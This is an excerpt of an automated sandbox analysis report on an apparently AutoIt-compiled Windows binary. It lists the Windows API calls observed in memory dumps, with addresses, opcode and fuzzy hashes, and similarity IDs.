• Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
• Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
Similarity
• API ID: IconNotifyShell_Timer$Kill
• String ID:
• API String ID: 3500052701-0
• Opcode ID: 84025cb5293b99825415f90277f67570891bdd2e2d74c1b985c19a687fb77d1a
• Instruction ID: bedde48ae76bf8328cc45f0fdd99201188c4a5764b7fae231c4bcccca1c0c872
• Opcode Fuzzy Hash: 84025cb5293b99825415f90277f67570891bdd2e2d74c1b985c19a687fb77d1a
• Instruction Fuzzy Hash: 4721B071504388AFE7338B209C59FF7BBED9F02319F04009EE29E96181C7755A889B51

APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003C3C26,004862F8,?,?,?,?,003C49C2,?), ref: 003D0ACE
Memory Dump Source
• Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
• Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
Similarity
• API ID: FullNamePath
• String ID: cH
• API String ID: 608056474-3538314586
• Opcode ID: 2478d51a65e2de582a2bd03719df154ac8a635dbc1d1cb257f72651c3816fb2c
• Instruction ID: 65fd9fa0235e67b258b17436f193ebbe4a15ba59bb87be5dbf1b226e4c7311b9
• Opcode Fuzzy Hash: 2478d51a65e2de582a2bd03719df154ac8a635dbc1d1cb257f72651c3816fb2c
• Instruction Fuzzy Hash: 0411C6329042089ACB42EBB4ED05EED77BCEF04350F0004A7B948DB240DA74EB844B14

APIs
  • Part of subcall function 003EA048: GetStartupInfoW.KERNEL32(?), ref: 003EA052
• __RTC_Initialize.LIBCMT ref: 003E7F19
• GetCommandLineW.KERNEL32(0047BD38,00000014), ref: 003E7F33
Memory Dump Source
• Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
• Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
Similarity
• API ID: CommandInfoInitializeLineStartup
• String ID:
• API String ID: 3075285763-0
• Opcode ID: c56f735511e393f9a35ad9ee2bfc79b770de1757d0d5a729ff0a355309160875
• Instruction ID: cef34c4013bc9d01165a7cedfd1b3b2d322ec0f65a7d4e6c680fcff28b81e3b7
• Opcode Fuzzy Hash: c56f735511e393f9a35ad9ee2bfc79b770de1757d0d5a729ff0a355309160875
• Instruction Fuzzy Hash: 8721C460A083F599DB27BBB6984BF7D2264AF40715F110B6AF604EE1C2DFB4894247A1

APIs
• Shell_NotifyIconW.SHELL32(?,?), ref: 003C44A6
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 003C44C3
Memory Dump Source
• Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
• Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
Similarity
• API ID: IconNotifyShell_
• String ID:
• API String ID: 1144537725-0
• Opcode ID: 203829223cd225e453a9611bbdc4a1e59cfc77ea03f45a4ed381c3f12eb1f4c2
• Instruction ID: 403306f26cd2b725ca04305cd51f8147f1aadd6b0b1a5c8be41981443c47b04b
• Opcode Fuzzy Hash: 203829223cd225e453a9611bbdc4a1e59cfc77ea03f45a4ed381c3f12eb1f4c2
• Instruction Fuzzy Hash: AE31AEB15043019FD725EF35E884BABBBE8EB09309F10097EF19AC6240D775A948CB56

APIs
• FindCloseChangeNotification.KERNELBASE(00000000,?,00000109,?,003F8469,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003F0D7D
• GetLastError.KERNEL32(?,003F8469,?,?,?,?,?,?,?,?,?,00000000,00000109,?,00000000,0047BC78), ref: 003F0D87
Memory Dump Source
• Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
• Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
Similarity
• API ID: ChangeCloseErrorFindLastNotification
• String ID:
• API String ID: 1687624791-0
• Opcode ID: 0dca3f5aca152cc874af70b72fbf55381a53c14a70a949c1accd1404b6a4ff72
• Instruction ID: 65f8590fcaf31f993927e7df3c0097204a93c6db19d067909c2928770d537e08
• Opcode Fuzzy Hash: 0dca3f5aca152cc874af70b72fbf55381a53c14a70a949c1accd1404b6a4ff72
• Instruction Fuzzy Hash: 020161376010B815C62B1BFDBD49B7E2B4D9B82774F160319FA588A0D3DAA0A4404191

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,003C5981,?,?,?,?), ref: 003C5E27
                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,003C5981,?,?,?,?), ref: 003FE19C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    APIs
                                                    • IsThemeActive.UXTHEME ref: 003C4992
                                                      • Part of subcall function 003E35AC: DecodePointer.KERNEL32(00000001,?,003C49A7,004181BC), ref: 003E35BE
                                                      • Part of subcall function 003E35AC: EncodePointer.KERNEL32(?,?,003C49A7,004181BC), ref: 003E35C9
                                                      • Part of subcall function 003C4A5B: SystemParametersInfoW.USER32 ref: 003C4A73
                                                      • Part of subcall function 003C4A5B: SystemParametersInfoW.USER32 ref: 003C4A88
                                                      • Part of subcall function 003C3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,003C49C2,?), ref: 003C3B7A
                                                      • Part of subcall function 003C3B4C: IsDebuggerPresent.KERNEL32(?,?,?,003C49C2,?), ref: 003C3B8C
                                                      • Part of subcall function 003C3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,004862F8,004862E0,?,?,?,003C49C2,?), ref: 003C3BFD
                                                      • Part of subcall function 003C3B4C: SetCurrentDirectoryW.KERNEL32(?,?,003C49C2,?), ref: 003C3C81
                                                    • SystemParametersInfoW.USER32 ref: 003C49D2
                                                    Similarity
                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme
                                                    • String ID:
                                                    • API String ID: 1658450864-0
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,003E7F43), ref: 003F5178
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,003E7F43), ref: 003F51C1
                                                    Similarity
                                                    • API ID: EnvironmentStrings$Free
                                                    • String ID:
                                                    • API String ID: 3328510275-0
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    APIs
                                                    • timeGetTime.WINMM ref: 003D2E1A
                                                      • Part of subcall function 003D0B30: PeekMessageW.USER32 ref: 003D0BBB
                                                    • Sleep.KERNEL32(00000000), ref: 003D2E53
                                                    Similarity
                                                    • API ID: MessagePeekSleepTimetime
                                                    • String ID:
                                                    • API String ID: 1792118007-0
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,003E9C64,00000000,003E8D6D,003E59D3,?,?,003E1013,?), ref: 003E2FA9
                                                    • GetLastError.KERNEL32(00000000,?,003E9C64,00000000,003E8D6D,003E59D3,?,?,003E1013,?), ref: 003E2FBB
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 485612231-0
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    Similarity
                                                    • API ID: _strcat
                                                    • String ID:
                                                    • API String ID: 1765576173-0
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,00000000,00000000,?,?,?,?,00427A0A,?,?,0043E864,?,00000000), ref: 00425E35
                                                    Similarity
                                                    • API ID: BuffCharLower
                                                    • String ID:
                                                    • API String ID: 2358735015-0
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,?,?,?,00000000,?,?,00000000), ref: 003C5CF6
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 003FEEAC
                                                      • Part of subcall function 003C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C48A1,?,?,003C37C0,?,00000000,00000001), ref: 003C48CE
                                                      • Part of subcall function 003E09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003E09F4
                                                    Similarity
                                                    • API ID: Name$Path$FileFullLongOpen
                                                    • String ID:
                                                    • API String ID: 779396738-0
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003C4D13: FreeLibrary.KERNEL32(00000000,?,003C4F4F,00000000,004862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,00000000,00000001), ref: 003C4D4D
                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,00000000,004862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,00000000,00000001), ref: 003C4F6F
                                                      • Part of subcall function 003C4CC8: FreeLibrary.KERNEL32(00000000,003FDD1E,00000000,004862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,00000000,00000001), ref: 003C4D02
                                                    Similarity
                                                    • API ID: Library$Free$Load
                                                    • String ID:
                                                    • API String ID: 2391024519-0
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    APIs
                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 003E552B
                                                    Similarity
                                                    • API ID: CallFilterFunc@8
                                                    • String ID:
                                                    • API String ID: 4062629308-0
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00F60000,00000000,00000001,?,?,?,?,003E1013,?), ref: 003E598F
                                                      • Part of subcall function 003EA408: GetModuleFileNameW.KERNEL32(?,004843BA,00000104,?,00000001,00000000), ref: 003EA49A
                                                      • Part of subcall function 003E32DF: ExitProcess.KERNEL32 ref: 003E32EE
                                                    Similarity
                                                    • API ID: AllocateExitFileHeapModuleNameProcess
                                                    • String ID:
                                                    • API String ID: 1715456479-0
                                                    • Opcode ID: 52f216419c216d513875ae52463187bf684ffcd73874ef9eeb68639481bebbbd
                                                    • Instruction ID: 1cce62d6cd2cc4f3e43b07ad8162a82f7fef7b0ee78cd99827a3793db4749529
                                                    • Opcode Fuzzy Hash: 52f216419c216d513875ae52463187bf684ffcd73874ef9eeb68639481bebbbd
                                                    • Instruction Fuzzy Hash: 7001C432201AB6EEE6133B73EC41AAE3348CF527B9F11072AF404AE1C2DB705D005669
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • IsWindow.USER32(00000000), ref: 00401054
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Window
                                                    • String ID:
                                                    • API String ID: 2353593579-0
                                                    • Opcode ID: e2337375fdcb5d92b41c9ab07e4dba488a6dfd0ff0aba09e147941ec613f6653
                                                    • Instruction ID: 05e8302965a7c3963da68737b9c40b9ff10bd872adefa5873c371ec0ed07f168
                                                    • Opcode Fuzzy Hash: e2337375fdcb5d92b41c9ab07e4dba488a6dfd0ff0aba09e147941ec613f6653
                                                    • Instruction Fuzzy Hash: D011CEB2201556BED71AAB30EC85EFAFB6CFB05394F00052BF559D5060C731AA24C7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000000,00010000,?,00000000,00000000,?,00010000,?,003C5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 003C5D76
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 20f27882e49b2d576803f4432f784918bd4e81cb35b9eb443d7d5fa562828c17
                                                    • Instruction ID: 076a9aad42c7246a3c87e84233ed5e73eaec66848dea3d24fb1065c3428e7088
                                                    • Opcode Fuzzy Hash: 20f27882e49b2d576803f4432f784918bd4e81cb35b9eb443d7d5fa562828c17
                                                    • Instruction Fuzzy Hash: 4C112571204B019FD3329F05C888F62BBE9EB45760F10892EE4AB8AA50D771FD85CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 2685eb10da9238003343a3300721150ca984b3bd90e0bbfea4fa4f9b81b8eae0
                                                    • Instruction ID: c29f8121602521776c3f39ca5dcb058ac4d0998c679c8834dae4684b3a97ad6f
                                                    • Opcode Fuzzy Hash: 2685eb10da9238003343a3300721150ca984b3bd90e0bbfea4fa4f9b81b8eae0
                                                    • Instruction Fuzzy Hash: 3F01C47AA00118CFDF22DB84D884FBDB3F6EB51360B56842AE959EB640C731ED41CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CharUpperBuffW.USER32(00000000,?,00000000,?,-00000003,?,003D3FC9,00000000,?,?,-00000003,00000000,00000000), ref: 003C83E0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID:
                                                    • API String ID: 3964851224-0
                                                    • Opcode ID: a8c0223343184ffe51df759d2b4fd00b45c3df0fd18c1506851a8e1bb3c26bf8
                                                    • Instruction ID: 3148efbf25b0c9e11bd786438e77e2e1c3fe53dd4dd2df07f57662d1bb73d436
                                                    • Opcode Fuzzy Hash: a8c0223343184ffe51df759d2b4fd00b45c3df0fd18c1506851a8e1bb3c26bf8
                                                    • Instruction Fuzzy Hash: 2CF0C87A105622ABD3265B95DC01F57FB98EF05BA1F10453EF644D5440CF31D820CBD4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: de8cdbe651be7bb9cf4f64f028a37391a0641722708f31b07f77593dc295c7de
                                                    • Instruction ID: f963e02b9259e431b43d49eda226b1f86e1c4fa26c2af2e0682b2a4052c08976
                                                    • Opcode Fuzzy Hash: de8cdbe651be7bb9cf4f64f028a37391a0641722708f31b07f77593dc295c7de
                                                    • Instruction Fuzzy Hash: 61F0E57A600158CFDF219FC4E844FBAB7E8DF01361F10043AE545EB500C732AC408B51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 5d7a4175efdd34d28f31ec5a894d023880474e674a8e34b49507ab5bc9e6f712
                                                    • Instruction ID: 81a4c59f4b699a03c2e59eb9ae5f6ac0d41304315c22ca1b09c7a0c7791cc667
                                                    • Opcode Fuzzy Hash: 5d7a4175efdd34d28f31ec5a894d023880474e674a8e34b49507ab5bc9e6f712
                                                    • Instruction Fuzzy Hash: 9EF05572614049AEE7208B70A80CF72F788DB10315F20003FE085C14C0CBBA5C849366
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 2748ad0215ee40832e02f6083ef4d7b7d7e69c59aa4b8bd34c2ad702cd32eb2c
                                                    • Instruction ID: 664fe98a39a6ce804ef296bd74da224bea2b8c178d04879d1fccd3a02429dafc
                                                    • Opcode Fuzzy Hash: 2748ad0215ee40832e02f6083ef4d7b7d7e69c59aa4b8bd34c2ad702cd32eb2c
                                                    • Instruction Fuzzy Hash: FFF01571004711CFCB369F64E8A5D52BBE5BB013293208A3EE1DB82A10C732AC44DF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003E09F4
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: LongNamePath
                                                    • String ID:
                                                    • API String ID: 82841172-0
                                                    • Opcode ID: 037d8a12ea6ed8bdac8d763e2e41a4924bac744d424e3c810ff1afe5921413b5
                                                    • Instruction ID: 9e4672d2a2a67deac45fb8ab9754f74903292b6f77bfc25de4337d544d83c63f
                                                    • Opcode Fuzzy Hash: 037d8a12ea6ed8bdac8d763e2e41a4924bac744d424e3c810ff1afe5921413b5
                                                    • Instruction Fuzzy Hash: C1E08637A410286AD7219296FC09FFBBB6CDB867F1F0000BBF90CD5404D9626C858670
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 003C4527
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: IconNotifyShell_
                                                    • String ID:
                                                    • API String ID: 1144537725-0
                                                    • Opcode ID: 88e884292027030e22dc4c2530dc906e3cf83bb3f0913ac4bc30bd9c44b84eb0
                                                    • Instruction ID: e94452facddc57fcf0da62a3a0249b13178168e0baf673795b0b78ecd69e9b74
                                                    • Opcode Fuzzy Hash: 88e884292027030e22dc4c2530dc906e3cf83bb3f0913ac4bc30bd9c44b84eb0
                                                    • Instruction Fuzzy Hash: 45F082719043189FD7A39B24DC49BA97B6C970130CF0002EEAA0C96196D7760B88CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,?,?,?,?), ref: 00424A18
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 65a6279161310a952fc4677f11fd6fc8d21fa2f604dd9b086be18c7038205035
                                                    • Instruction ID: 76840d9067677667fa39f8fbf64322a37a646a42ac85e27ba91736d028ba2773
                                                    • Opcode Fuzzy Hash: 65a6279161310a952fc4677f11fd6fc8d21fa2f604dd9b086be18c7038205035
                                                    • Instruction Fuzzy Hash: EED05B6650021C3EDB50A6B4AC0DDF77B6CDB01165F0002B1B55CC2051ED246D4587F0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,003C5921,?,003C6C37), ref: 003C5DEF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 302fe8e6dc0e56dcc1125afb6afa8d50a1673e4b9ff4ef5103bc3bb53c09197e
                                                    • Instruction ID: a03bda4838727be719154349686f8085fa3174a9e497ba1e067a2749aa2d5471
                                                    • Opcode Fuzzy Hash: 302fe8e6dc0e56dcc1125afb6afa8d50a1673e4b9ff4ef5103bc3bb53c09197e
                                                    • Instruction Fuzzy Hash: DDE0B679504B01DFC6324F1AE80C852FFF8FEE13B13218A2ED0E681560D3716889CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000001,?,?,?,003FE16B,?,?,00000000,?,?,00000000), ref: 003C5DBF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: d4d3c8421f133085cdb3c1436dfed155ca7664b86190c932d38b7d0861b2d66f
                                                    • Instruction ID: 3ad4c06231b74d52ad2a63bfb22b797b9578e810e78d5849087326f04f6e894e
                                                    • Opcode Fuzzy Hash: d4d3c8421f133085cdb3c1436dfed155ca7664b86190c932d38b7d0861b2d66f
                                                    • Instruction Fuzzy Hash: 13D09E75640108BFE6008780DC46FFA7B7CD706765F100195F5045559092B379448765
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,004253F4), ref: 00424CD4
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 9f9725cf56e2b252b67d1f4a0104ba18a44dcaaf7777a79094df3a8b3da8c11f
